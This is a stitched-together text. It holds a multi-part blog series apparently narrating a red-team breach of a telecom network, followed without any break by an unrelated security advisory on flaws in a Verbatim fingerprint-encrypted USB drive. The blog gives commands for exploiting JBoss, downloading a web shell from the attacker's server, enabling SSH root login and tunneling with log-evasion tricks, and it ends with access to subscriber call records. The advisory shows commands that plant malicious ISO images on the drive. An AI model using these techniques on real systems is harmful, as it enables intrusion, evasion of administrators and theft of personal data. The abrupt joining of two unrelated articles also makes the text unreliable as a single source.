So for the RTE, the obvious choices for recon were: DNS enumerations, ASN & BGP lookups, some passive recons from multiple search engines, checking out source code repositories such as GitHub, BitBucket, GitLab, etc. for something juicy, doing some OSINT on employees for spear phishing in case there was no RCE found. (Trust me when I say this, fooling an employee to download & execute malicious documents is easy to do but only if you could overcome the obstacles — AVs & Email Spam Filters)
There are just so many sources from where you can recon for a particular organization. In my case, I started off with the DNS enumeration itself.
Fun fact: The wordlist I used has 2.77 million unique DNS records.
Most of the bounty hunters will look for port 80 or 443 for all the sub-domains found. The thing is, sometimes it’s better to perform a full port scan just to be on the safe side. In my case, I found a sub-domain e[REDACTED]-nms.[REDACTED].com.[REDACTED] and after a full port scan, I got some interesting results.
The ports 12000/tcp and 14000/tcp were nothing special but 14100/tcp, let’s just say this was my lucky day!!
J-Fuggin-Boss!!
Remote Code Execution
From here on, everyone who has exploited the infamous JBoss vulnerabilities before knows how things will move forward. For newbies, if you haven’t had the experience with JBoss exploitation, you can check out the following links to help you out with the exploitation:
For JBoss exploitation, you can use Jexboss. There are many methods and exploitation techniques included in the tool and it also covers the Application and Servlet deserializations and Struct2. You can exploit JBoss using Metasploit as well, though I prefer Jexboss.
Continuing with the engagement, once I discovered JBoss, I quickly fired up Jexboss for the exploitation. The tool was easy to use.
As we can see from the above screenshot, the server was vulnerable. Using the JMXInvokerServlet method, I was then able to get the Remote Code Execution on the server. Pretty straight forward exploitation! Right?
You must be thinking, that was no advance level shit, so what’s different about this post?
Patience guys!
Now that I had the foothold, the actual issue arose. Of course like always, once I had the RCE I tried getting a reverse shell.
and I even got a back connection!
However, the shell was not stable and the python process was getting killed after a few seconds. I even tried using other reverse shell one-liner payloads, different common ports, even UDP too, but the result was the same. I also tried reverse_tcp/http/https Metasploit payloads in different forms to get meterpreter connections but the meterpreter shells were disconnected after a few seconds.
I have experienced some situations like these before and I always questioned what if I’m not able to get a reverse shell, how will I proceed?
Entering Bind shell connection over HTTP tunnel!
How I hacked into a Telecom Network — Part 2 (Playing with Tunnels: TCP Tunneling)
TLDR; Red Team Engagement for a telecom company. Got a foothold on the company’s Network Monitoring System (NMS). Sorted reverse shell issue with tunneling SSH over HTTP. Went full-on Ninja when getting SSH over HTTP. Proxied inside the network to get for internal network scan. Got access to CDRs and VLR with SS7 application.
Recap: Red Team Engagement for a Telecom company. Found interesting subdomain, did a full port scan on that subdomain, found port 12000/tcp, 14000/tcp, and 14100/tcp found a running instance of JBoss (lucky me!), exploited JBoss for RCE, now getting issue with the reverse shell.
Now that when I tried getting a stable reverse shell, I failed. The other idea that came to my mind was getting a bind shell (getting SSH over HTTP for stability purpose) instead of reverse over HTTP (TCP Tunnel over HTTP). But what exactly am I achieving here?
TCP Tunnel over HTTP (for TCP stability purpose + Stealthy SSH connection (over TCP Tunnel created) + SOCKS Tunnel (Dynamic SSH Tunnel) for internal network scan using Metasploit = Exploiting internal network service to exfil data via these recursive tunnels.
Looks very complex? Let’s break it down into multiple steps:
First, I created a bridge between my server and the NMS server so that it should support communication for different protocols other than just HTTP/HTTPS(>L2 for now) [TCP Tunnel over HTTP]
Once the bridge (TCP Tunnel over HTTP) was created, I configured and implemented SSH Port Forwarding from my server (2222/tcp) to the NMS server (22/tcp) so that I could connect to the NMS server via SSH over HTTP. (SSH over TCP over HTTP to be precise) Note: The SSH service on the NMS server was running on 127.0.0.1
I then, configured the NMS SSH server to allow root login and generate SSH private key (copy my Public Key to authorized_hosts file) for access to the NMS server via SSH.
I checked SSH connection to NMS using the private key and when it worked, I then created a Dynamic SSH Tunnel (SOCKS) to proxify Metasploit over SSH Tunnel (Metasploit over SSH Tunnel over TCP Tunnel over HTTP to be precise).
I want to blog it step by step on how I created the tunnels and the way I played with them.
Tunneling 101
A tunneling protocol is a communications protocol that allows for the movement of data from one network to another. It involves allowing private network communications to be sent across a public network (such as the Internet) through a process called encapsulation. Because tunneling involves repackaging the traffic data into a different form, perhaps with encryption as standard, it can hide the nature of the traffic that is run through a tunnel.
The tunneling protocol works by using the data portion of a packet (the payload) to carry the packets that actually provide the service. Tunneling uses a layered protocol model such as those of the OSI or TCP/IP protocol suite, but usually violates the layering when using the payload to carry a service not normally provided by the network. Typically, the delivery protocol operates at an equal or higher level in the layered model than the payload protocol.
Source: Wikipedia
So basically the idea is to use the webserver as an intermediate proxy to forward all the network packets (TCP packets) from the webserver to the internal network.
Forwarding TCP packets to the internal network through the web server using the HTTP protocol
TCP tunneling can help you in situations where you have restricted port access and filtered egress traffic. In my case, there was not much filtering however, I used this technique to get stable shell access.
Now that I already had an RCE on the server and that too with the “root” privilege. I quickly used this opportunity to create a JSP based shell using ABPTTS
A Black Path Toward The Sun (ABPTTS)
As explained in the GitHub repo,
ABPTTS uses a Python client script and a web application server page/package to tunnel TCP traffic over an HTTP/HTTPS connection to a web application server.
Currently, only JSP/WAR and ASP.NET server-side components are supported by this tool.
So the idea was to create a JSP based shell using ABPTTS and upload it to the web server, let the tool connect with the JSP shell, and create a TCP tunnel over HTTP to create a secure shell (SSH) between my system and the server.
python abpttsfactory.py -o jexws4.jsp
When the shell got generated using ABPTTS, the tool created a configuration file to be used for creating the TCP tunnel over HTTP/HTTPS.
I then uploaded the JSP shell to the server using wget. Note: The jexws4.war shell is a package for Jexboss. When you exploit the JBoss vulnerability via Jexboss, the tool will upload its own WAR shell to the server. In my case, I just tried to find this WAR/JSP shell (jexws4.jsp) and replace it with the ABPTTS shell
wget http://[MY SERVER]/jexws4.jsp -O <location of jexws4.jsp shell on NMS server>
Once the ABPTTS shell got uploaded onto the server, I quickly confirmed it on Jexboss by executing a random command to see the output. Why? Now that the Jexboss shell was overwritten by the ABPTTS shell, no matter what command I executed, the output was always the hash printed out due to the ABPTTS shell.
As you can see from the above screenshot, when I executed the “id” command, I got a weird hash in return that proves the ABPTTS shell was uploaded successfully!
Now that I had a TCP tunnel over HTTP configured, the next thing I wanted to do was tunnel the SSH port running on the server (22/tcp on NMS) and bind the port to my system (2222/tcp). Why? so that I could connect to NMS via SSH. Did you notice what I was trying to do here?
SSH port forwarding (not yet tunneled) via TCP tunnel over HTTP
Even though I had yet to configure the SSH part on the NMS and on my own server for the SSH Tunnel. For now, I just prepared the port forwarding mechanism so that I could reach the local port 22/tcp on NMS from my server using port 2222/tcp
I checked my connections table to check if the port is properly forwarded or not. As you can see in the below screenshot, my server’s port 2222/tcp was in the LISTEN state.
The next thing to do now is configuring the SSH server to connect to the NMS and start a Dynamic SSH Tunnel (SOCKS). I’ll cover this in the next post:
How I hacked into a Telecom Network — Part 3 (Playing with Tunnels: Stealthy SSH & Dynamic Tunnels)
TLDR; Red Team Engagement for a telecom company. Got a foothold on the company’s Network Monitoring System (NMS). Sorted reverse shell issue with tunneling SSH over HTTP. Went full-on Ninja when getting SSH over HTTP. Proxied inside the network to get for internal network scan. Got access to CDRs and VLR with SS7 application.
Recap: Red Team Engagement for a Telecom company. Found interesting subdomain, did a full port scan on that subdomain, found port 12000/tcp, 14000/tcp, and 14100/tcp found a running instance of JBoss (lucky me!), exploited JBoss for RCE, implemented TCP tunnel over HTTP for Shell Stability.
DISCLAIMER: This post is quite lengthy so just sit back,be patient and enjoy the ride!
In the previous part, I mentioned the steps I followed and I configured TCP Tunnel over HTTP and SSH port forwarding to access port 22/tcp of NMS server from my server using port 2222/tcp. In this blog post, I’ll show how I implemented SSH Dynamic Tunnels for further network exploitation.
Stealthy SSH Access
When you’re connected to an SSH server, the connection details are saved in a log file. To check these connection details, you can execute the ‘w’ command in *nix systems.
The command w on many Unix-likeoperating systems provides a quick summary of every user logged into a computer, what each user is currently doing, and what load all the activity is imposing on the computer itself. The command is a one-command combination of several other Unix programs: who, uptime, and ps -a. Source: Wikipedia
So basically, the source IP is saved which is dangerous for a red teamer. As this was a RTE, I could not take the chance of letting the admin know about my C2 location. (don’t worry, the ABPTTS shell that I used was connected from my server and I already bought a domain for IDN Homograph attacksto reduce my chances of detection)
For the stealthy connection to work, I checked the hosts file to gather more information and I found that this server is being used quite heavily inside the network.
Such a server was already being monitored so I was thinking of ways to be as stealthy as possible in such a scenario. NMS was already monitoring the network so I thought it must be monitoring itself that includes all the network connections to/from the server. This means I can’t use a normal port scan using the TCP tunnel over HTTP.
How about encrypting the communication between my server and the NMS server using SSH? But for SSH connection, my hostname/IP will be stored in the log files, and also the username would be easy to identify.
In this case, my server’s username was ‘harry’, and generating a key for this user which I’ll store in the authorized_keys file was not a good option.
And then I came up with an Idea (in steps),
Create the user ‘nms’ (this user was already created in the NMS server) on my server.
Change my server’s hostname from OPENVPN to [REDACTED]_NMS[REDACTED]. (the same as the NMS server)
Generate SSH keys for ‘nms’ user on my server and copy the public key in the NMS server. (authorized_keys)
Configure the SSH server running on NMS to enable root login (PermitRootLogin), TCP port forwarding & gateway ports. (SSH -g switch just in case)
Configure the NMS server to act as a SOCKS proxy for my further network exploitation. (Dynamic SSH Tunnel)
The SOCKS tunnel is encrypted now and I can use this tunnel to do an internal network scan using Metasploit.
Implementation time!
I began by first adding the user ‘nms’ on my server so that I could generate the user-specific SSH keys.
I even changed the hostname of my server with the exact same for the NMS server so that when I log in using SSH, the logs will show a user login entry as nms@[REDACTED]_NMS[REDACTED]
Next, I generated the SSH Keys for ‘nms’ user on my server.
I also had to change the SSH configurations on the NMS server so I downloaded the sshd_config file from the server and changed few things inside.
AllowTCPForwarding: This option is used to enable TCP port forwarding via SSH.
GatewayPorts: This option enables the port binding to interfaces other than loopback on remote ports. (I’m enabling this option just in case if I want a reverse shell from other internal systems on this server which will forward the shell to me via Reverse Port Forwarding)
PermitRootLogin: This option permits the client to connect to the SSH server using ‘root’.
StrictModes: This option specifies whether SSH should check the user’s permissions in their home directory before accepting login.
Now that the configuration was done, I quickly uploaded (more like overwrite) the sshd_config file on to the NMS server.
And I also copied the SSH public key to ‘root’ user’s authorized_keys file
After everything was set, I then tried a test connection just to check if I’m able to do SSH using ‘root’ on the NMS server or not!
Booyah! 😎😎😎
SSH over TCP over HTTP (SSH port forward over TCP Tunnel created over HTTP connection via ABPTTS shell (JSP))
Dynamic port forwarding (DPF) is an on-demand method of traversing a firewall or NAT through the use of firewall pinholes. The goal is to enable clients to connect securely to a trusted server that acts as an intermediary for the purpose of sending/receiving data to one or many destination servers.
DPF can be implemented by setting up a local application, such as SSH, as a SOCKS proxy server, which can be used to process data transmissions through the network or over the Internet.
Once the connection is established, DPF can be used to provide additional security for a user connected to an untrusted network. Since data must pass through the secure tunnel to another server before being forwarded to its original destination, the user is protected from packet sniffing that may occur on the LAN.
So all I had to do was create a Dynamic SSH Tunnel so that the NMS server would act as a SOCKS proxy server. Some of the benefits I had for using a SOCKS tunnel:
Got indirect access to other network devices/servers through the NMS server (NMS server becomes the gateway for me)
Because of the Dynamic SSH Tunnel, all the traffic originating from my server to the NMS server got encrypted (usedSSH connection, remember?)
Even if a server admin sits on the NMS server and monitors the network, he won’t be able to exactly find the root cause right away. (A dedicated one would definitely join the dots)
The connection was stable (thanks to HTTP Keep-Alive), now all these recursive tunnels were running smoothly without any connection drop because of the TCP Tunnel that I implemented over HTTP.
When I logged in to the NMS server over SSH, here’s what the ‘w’ command showed me:
Now all I had to do was create the SOCKS tunnel and which I did using the command: ssh -NfCq -D 9090 -i <private key/identity file> <user@host> -p <ssh custom port>
The ‘PermitRootLogin’ was changed in sshd_config file for this purpose (to log in to the NMS server as root).
Worried what the server admin would think about the setup? Generally, when SSH connections are opened, server admin sometimes checks the username that logged in, the authorized keys that were used to log in but most of the time, he checks the hostname/IP from where the connection was initiated.
In my case, I initiated the connection from my server where the address was 127.0.0.1 using port 2222/tcp (thanks to TCP tunnel over HTTP) to the NMS server with destination address as 127.0.0.1 (again!). Now because of this setup, all he would see is a connection initiated by the NMS server to the NMS server SSH using the authorized keys (the public key) stored as user ‘nms’ (that’s why I created the same user on my host to generate the keys) and even if the admin checked the known_hosts file, all he would see is ‘nms@[REDACTED]_NMS[REDACTED]’ user connected to the SSH with IP as 127.0.0.1 which was already a user profile in the NMS server.
To confirm the SOCKS tunnel, I checked the connection table on my server and port 9090/tcp was in the LISTEN state.
Awesome! The SOCKS Tunnel is ready!
All that was left for me was to use the SOCKS tunnel for Metasploit for further network exploitation which I’ll cover in the next post (the final part):
Pro Tip!
When you connect to a server over SSH, a pseudo TTY is automatically allocated. Of course, this doesn’t happen when you’re executing commands via SSH (one-liners). So whenever you want to tunnel through SSH or create a SOCKS tunnel, try the -T switch to disable the pseudo TTY allocation. You can also use the below command:
ssh -NTfCq -L <local port forwarding> <user@host>
ssh -NTfCq -D <Dynamic port forwarding> <user@host>
To check all the SSH switches you can refer to the SSH manual (HIGHLY RECOMMENDED!). When creating a tunnel with the switches (showed above), you can create a tunnel without a TTY allocation and the tunneled port will work just fine!
How I hacked into a Telecom Network — Part 4 (Getting Access to CDRs, SS7 applications & VLRs)
TLDR; Red Team Engagement for a telecom company. Got a foothold on the company’s Network Monitoring System (NMS). Sorted reverse shell issue with tunneling SSH over HTTP. Went full-on Ninja when getting SSH over HTTP. Proxied inside the network to get for internal network scan. Got access to CDRs and VLR with SS7 application.
Recap: Red Team Engagement for a Telecom company. Found interesting subdomain, did a full port scan on that subdomain, found port 12000/tcp, 14000/tcp, and 14100/tcp found a running instance of JBoss (lucky me!), exploited JBoss for RCE, implemented TCP tunnel over HTTP for Shell Stability.
In the previous part (Playing with Tunnels: Stealthy SSH & Dynamic SSH Tunnels), I mentioned the steps I followed to create SSH Tunnels with stealthy SSH access from my server using port 2222/tcp. In this blog post, I’ll show how I used the SOCKS Tunnel for internal network reconnaissance and to exploit internal servers to get access to the CDRs stored in a server.
Situational Awareness (Internal Network)
During the engagement, I was able to create a Dynamic SSH tunnel via TCP tunnel over HTTP, and believe me when I say this, the shell was neat!
Moving forward, I then configured the SOCKS tunnel over port 9090/tcp and then connected proxychains for NMap scans.
Though I prefer Metasploit instead of NMap as it gave me more coverage over scans and I was able to manage the internal IP scans easily with it. To use the proxies for all the modules I used the “setg Proxies socks4:127.0.0.1:9090” command (to set proxy option globally). I looked for internal web servers so I used auxiliary/scanner/http/http_version module.
Because of setg, the Proxies option was already set, now all I needed to do was just give the IP subnet range and run the module.
I found some Remote Management Controllers (iRMC), some SAN switches (switchExplorer.html), and a JBoss Instance …
There’s another JBoss instance used internally? 🤣
Exploiting Internal Network Service
So there was another JBoss Instance running on port 80/tcp on an internal IP 10.x.x.x. So all I had to do was use proxychains and run JexBoss once more on the internal IP (I could have also used -P switch in JexBoss to provide the proxy address).
This was an easy win for me as the internal JBoss server running was also vulnerable and due to that, I was able to get RCE from my pivotal machine (initial foothold machine) to the next internal JBoss server 😎
Awesome! Now, when I got the shell, I used the following command to list down all the files and directories under the /home/<user> location in a structured way:
cd /home/<user> | find . -print | sed -e “s;[^/]*/;|_ _ _ _;g;s;_ _ _ _|; |;g” 2>&1
In the output, I found an interesting .bat file — ss7-cli.bat (The script configures the SS7 Management Shell Bootstrap Environment)
In the same Internal JBoss server, a Visitor Location Register (VLR) console client application was also stored to access the VLR information from the database.
To monitor the SS7/ISDN links and decode the protocol standards and generate CDRs for billing purposes, a console client is required that will interact with the system.
You may ask why there was an SS7 client application running on JBoss? One word — “Mobicents”
Mobicents
Mobicents is an Open Source VoIP Platform written in Java to help create, deploy, manage services and applications integrating voice, video, and data across a range of IP and legacy communications networks. Source: Wikipedia
Mobicents enables the composition of Service Building Blocks (SBB) such as call control, billing, user provisioning, administration, and presence-sensitive features. This makes Mobicents servers an easy choice for telecom Operations Support Systems (OSS) and Network Management Systems (NMS). Source: design.jboss.org
So it looks like the internal JBoss server is running a VoIP gateway application (SIP server) that is interacting with the Public Switched Telephone Network (PSTN) using SS7. (This was tiring to get to know the internal network structure without any kind of network architecture diagram)
Going beyond
While doing some more recon in the internal JBoss application running a VoIP gateway, I found that there were some internal gateway servers, CDR backup databases, FTP servers that stored backup configurations of SS7 and USSD protocol, etc.(Thanks to /etc/hosts)
rom the hosts file, I found a lot of FTP servers which at first I didn’t really felt important but then I found the CDR-S and CDR-L FTP servers. These servers were storing the backup CDR S-Records and CDRL-Recordsrespectively.
You can read more about these records from here: CDR S-Records: Page 157 & CDR L-Records: Page 168
Using Metasploit, I quickly scanned these FTP servers and checked for their authenticated status.
The FTP servers were accessible without any kind of authentication 🤣🤣
Maybe the FTP servers were used for internal use by VoIP applications or something else but still, a win is a win!
Due to this, I was able to get to the CDR backups that were stored in XLS format for almost all the mobile subscribers. (Sorry but I had to redact a lot as these were really critical information)
From the screenshot, A Number is from where the call was originated (the caller) and B Number was the dialed number. The CDR record also included the IMSI & IMEI numbers, Call Start/End Date & Timestamp, Call duration, Call Types (Incoming calling or Outgoing), Service Type (the telecom service companies), Cell ID-A (The Cell Tower from where the call was originated) and Location-A (The location of the caller)
Once our team notified the client regarding our access to the CDR Backup servers, the client asked us to end our engagement there. I guess it was too much for them to take it 🤣
I hope you guys enjoyed it!
Promotion Time!
If you guys want to learn more about the techniques I used and the basic concepts behind it, you can read my books (co-authored with @himanshu_hax)
In the second article of this series, SySS IT security expert Matthias Deeg presents security vulnerabilities found in another crypto USB flash drive with AES hardware encryption.
Introduction
In the second part of this blog series, the research results concerning the secure USB flash drive Verbatim Executive Fingerprint Secure SSD shown in the following Figures are presented.
Front view of the secure USB flash drive Verbatim Executive Fingerprint Secure
The Verbatim Executive Fingerprint Secure SSD is a USB drive with AES 256-bit hardware encryption and a built-in fingerprint sensor for unlocking the device with previously registered fingerprints.
The manufacturer describes the product as follows:
The AES 256-bit Hardware Encryption seamlessly encrypts all data on the drive in real-time. The drive is compliant with GDPR requirements as 100% of the drive is securely encrypted. The built-in fingerprint recognition system allows access for up to eight authorised users and one administrator who can access the device via a password. The SSD does not store passwords in the computer or system’s volatile memory making it far more secure than software encryption.
The used test methodology regarding this research project, the considered attack surface and attack scenarios, and the desired security properties expected in a secure USB flash drive were already described in the first part of this article series.
Hardware Analysis
When analyzing a hardware device like a secure USB flash drive, the first thing to do is taking a closer look at the hardware design. By opening the case of the Verbatim Executive Fingerprint Secure SSD, its printed circuit board (PCB) can be removed. The following figure shows the front side of the PCB and the used SSD with an M.2 form factor.
PCB front side of Verbatim Executive Fingerprint Secure SSD
Here, we can already see the first three main components of this device:
NAND flash memory chips
a memory controller (Maxio MAS0902A-B2C)
a SPI flash memory chip (XT25F01D)
On the back side of the PCB, the following further three main components can be found:
a USB-to-SATA bridge controller (INIC-3637EN)
a fingerprint sensor controller (INIC-3782N)
a fingerprint sensor
PCB back side of Verbatim Executive Fingerprint Secure SSD
The Maxio memory controller and the NAND flash memory chips are part of an SSD in M.2 form factor. This SSD can be read and written using another SSD enclosure supporting this form factor which was very useful for different security tests.
By having a closer look at the encrypted data, obvious patters could be seen, as the following hexdump illustrates:
# hexdump -C /dev/sda
00000000 7c a1 eb 7d 4e 39 1e b1 9b c8 c6 86 7d f3 dd 70 ||..}N9......}..p|
*
000001b0 99 e8 74 12 35 1f 1b 3b 77 12 37 6b 82 36 87 cf |..t.5..;w.7k.6..|
000001c0 fa bf 99 9e 98 f7 ba 96 ba c6 46 3a e5 bc 15 55 |..........F:...U|
000001d0 7c a1 eb 7d 4e 39 1e b1 9b c8 c6 86 7d f3 dd 70 ||..}N9......}..p|
*
000001f0 92 78 15 87 cd 83 76 30 56 dd 00 1e f2 b3 32 84 |.x....v0V.....2.|
00000200 7c a1 eb 7d 4e 39 1e b1 9b c8 c6 86 7d f3 dd 70 ||..}N9......}..p|
*
00100000 1e c0 fa 24 17 d9 4b 72 89 44 20 3b e4 56 99 32 |...$..Kr.D ;.V.2|
00100010 d8 65 93 7c 37 aa 8f 59 5e ec f1 e7 e6 9b de 9e |.e.|7..Y^.......|
[...]
The
*
in this hexdump output means that the previous line (here 16 bytes of data) is repeated one or more times. The first column showing the address indicates how many consecutive lines are the same. For example, the first 16 bytes
7c a1 eb 7d 4e 39 1e b1 9b c8 c6 86 7d f3 dd 70
are repeated 432 (0x1b0) times starting at the address
0x00000000
, and the same pattern of 16 bytes is repeated 32 times starting at the address
0x000001d0
.
Seeing such repeating byte sequences in encrypted data is not a good sign, as we already know from part one of this series.
By writing known byte patterns to an unlocked device, it could be confirmed that the same 16 bytes of plaintext always result in the same 16 bytes of ciphertext. This looks like a block cipher encryption with 16 byte long blocks using Electronic Codebook (ECB)mode was used, for example AES-256-ECB.
For some data, the lack of the cryptographic property called diffusion, which this operation mode has, can leak sensitive information even in encrypted data. A famous example for illustrating this issue is a bitmap image of Tux, the Linux penguin, and its ECB encrypted data shown in the following Figure.
This found security issue was reported in the course of our responsible disclosure program via the security advisory SYSS-2022-010 and was assigned the CVE ID CVE-2022-28382.
Firmware Analysis
The SPI flash memory chip (XT25F01D) of the Verbatim Executive Fingerprint Secure SSD contains the firmware for the USB-to-SATA bridge controller Initio INIC-3637EN. The content of this SPI flash memory chip could be extracted using the universal programmer XGecu T56.
When analyzing the firmware, it could be found out that the firmware validation only consists of a simple CRC-16 check using XMODEM CRC-16. Thus, an attacker is able to store malicious firmware code for the INIC-3637EN with a correct checksum on the used SPI flash memory chip.
For updating modified firmware images, a simple Python tool was developed that fixes the required CRC-16, as the following output exemplarily shows.
Thus, an attacker is able to store malicious firmware code for the INIC-3637EN with a correct checksum on the used SPI flash memory chip (XT25F01D), which then gets successfully executed by the USB-to-SATA bridge controller. For instance, this security vulnerability could be exploited in a so-called supply chain attack when the device is still on its way to its legitimate user.
An attacker with temporary physical access during the supply could program a modified firmware on the Verbatim Executive Fingerprint Secure SSD, which always uses an attacker-controlled AES key for the data encryption, for example. If the attacker later on gains access to the used USB drive, he can simply decrypt all contained user data.
This found security issue concerning the insufficient firmware validation, which allows an attacker to store malicious firmware code for the USB-to-SATA bridge controller on the USB drive, was reported in the course of our responsible disclosure program via the security advisory SYSS-2022-011 and was assigned the CVE ID CVE-2022-28383.
Protocol Analysis
The hardware design of the Verbatim Executive Fingerprint Secure SSD allowed for sniffing the serial communication between the fingerprint sensor controller (INIC-3782N) and the USB-to-SATA bridge controller (INIC-3637EN).
The following Figure exemplarily shows exchanged data when unlocking the device with a correct fingerprint. The actual communication is bidirectional and different data packets are exchanged during an unlocking process.
Sniffed serial communication when unlocking with a correct fingerprint shown in logic analyzer
In the course of this research project, no further time was spent to analyze the used proprietary protocol between the fingerprint sensor controller and the USB-to-SATA bridge controller, as a simpler way could be found to attack this device, which is described in the next section.
For the biometric authentication, a fingerprint sensor and a specific microcontroller (INIC-3782N) are used. Unfortunately, no public information about the INIC-3782N could be found, like data sheets or programming manuals.
For the registration of fingerprints, a client software (available for Windows or macOS) is used. The client software also supports a password-based authentication for accessing the administrative features and unlocking the secure disk partition containing the user data. The following Figure shows the login dialog of the provided client software for Windows.
Password-based authentication for administrator (
VerbatimSecure.exe
)
Software Analysis
The client software for Windows and macOS is provided on an emulated CD-ROM drive of the Verbatim Executive Fingerprint Secure SSD, as the following Figure exemplarily illustrates.
Emulated CD-ROM drive with client software
During this research project, only the Windows software in form of the executable
VerbatimSecure.exe
was analyzed. This Windows client software communicates with the USB storage device via
IOCTL_SCSI_PASS_THROUGH
(
0x4D004
) commands using the Windows API function
DeviceIoControl
. However, simply analyzing the USB communication by setting a breakpoint on this API function in a software debugger like [x64dbg][x64db] was not possible, because the USB communication is AES-encrypted as the following Figure exemplarily illustrates.
Encrypted USB communication via
DeviceIoControl
Fortunately, the Windows client software is very analysis-friendly, as meaningful symbol names are present in the executable, for example concerning the used AES encryption for protecting the USB communication.
The following Figure shows the AES (Rijndael) functions found in the Windows executable
VerbatimSecure.exe
.
AES functions of the Windows client software
Here, especially the two functions named
CRijndael::Encrypt
and
CRijndael::Decrypt
were of greater interest.
Furthermore, runtime analyses of the Windows client software using a software debugger like x64dbg could be performed without any issues. And in doing so, it was possible to analyze the AES-encrypted USB communication in cleartext, as the following Figure with a decrypted response from the USB flash drive illustrates.
Decrypted USB communication (response from device)
For securing the USB communication, AES with a hard-coded cryptographic key is used.
When analyzing the USB communication between the client software and the USB storage device, a very interesting and concerning observation was made. That is, before the login dialog with the password-based authentication is shown, there was already some USB device communication with sensitive data. And this sensitive data was nothing less than the currently set password for the administrative access.
The following Figure shows the corresponding decrypted USB device response with the current administrator password
S3cretP4ssw0rd
in this example.
Decrypted USB device response containing the current administrator password
Thus, by accessing the decrypted USB communication of this specific IOCTL command, for instance using a software debugger as illustrated in the previous Figure, an attacker can instantly retrieve the correct plaintext password and thus unlock the device in order to gain unauthorized access to its stored user data.
In order to simplify the password retrieval process, a software tool named
Verbatim Fingerprint Secure Password Retriever
was developed that can extract the currently set password of a Verbatim Executive Fingerprint Secure SSD. The following Figure exemplarily shows the successful retrieval of the password
S3cretP4ssw0rd
that was previously set on this test device.
Successful attacking using the developed Verbatim Fingerprint Secure Password Retriever
This found security vulnerability was reported in the course of our responsible disclosure program via the security advisory SYSS-2022-009 with the assigned CVE ID CVE-2022-28387.
As described previously, the client software for administrative purposes is provided on an emulated CD-ROM drive. As my analysis showed, the content of this emulated CD-ROM drive is stored as an ISO-9660 image in the hidden sectors of the USB drive, that can only be accessed using special IOCTL commands, or when installing the drive in an external enclosure.
The following
fdisk
output shows disk information using the Verbatim enclosure with a total of 1000179711 sectors.
# fdisk -l /dev/sda
Disk /dev/sda: 476.92 GiB, 512092012032 bytes, 1000179711 sectors
Disk model: Portable Drive
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xbfc4b04e
Device Boot Start End Sectors Size Id Type
/dev/sda1 2048 1000171517 1000169470 476.9G c W95 FAT32 (LBA)
The next
fdisk
output shows the information for the same disk when using an external enclosure where a total of 1000215216 sectors is available.
And in those 35505 hidden sectors concerning the tested 512 GB version of the Verbatim Executive Fingerprint Secure SSD, the ISO-9660 image with the content of the emulated CD-ROM drive is stored, as the following output illustrates.
# dd if=/dev/sda bs=512 skip=1000179711 of=cdrom.iso
35505+0 records in
35505+0 records out
18178560 bytes (18 MB, 17 MiB) copied, 0.269529 s, 67.4 MB/s
# file cdrom.iso
cdrom.iso: ISO 9660 CD-ROM filesystem data 'VERBATIMSECURE'
By manipulating this ISO-9660 image or replacing it with another one, an attacker is able to store malicious software on the emulated CD-ROM drive. This malicious software may get executed by an unsuspecting victim when using the device at a later point in time.
The following Figure exemplarily shows what an emulated CD-ROM drive manipulated by an attacker containing malware my look like.
Emulated CD-ROM drive with attacker-controlled content
The following output exemplarily shows how a hacked ISO-9660 was generated for testing this attack vector.
# mkisofs -o hacked.iso -J -R -V "VerbatimSecure" ./content
# dd if=hacked.iso of=/dev/sda bs=512 seek=1000179711
25980+0 records in
25980+0 records out
13301760 bytes (13 MB, 13 MiB) copied, 1.3561 s, 9.8 MB/s
As a thought experiment, this security issue concerning the data authenticity of the ISO-9660 image for the emulated CD-ROM partition could be exploited in an attack scenario one could call The Poor Hacker’s Not Targeted Supply Chain Attack which consists of the following steps:
Buy vulnerable devices in online shops
Modify bought devices by adding malware
Return modified devices to vendors
Hope that returned devices are resold and not destroyed
Wait for potential victims to buy and use the modified devices
Profit?!
This found security issue was reported in the course of our responsible disclosure program via the security advisory SYSS-2022-013 with the assigned CVE ID CVE-2022-28385.
Summary
In this article, the research results leading to four different security vulnerabilities concerning the Verbatim Executive Fingerprint Secure SSD listed in the following Table were presented.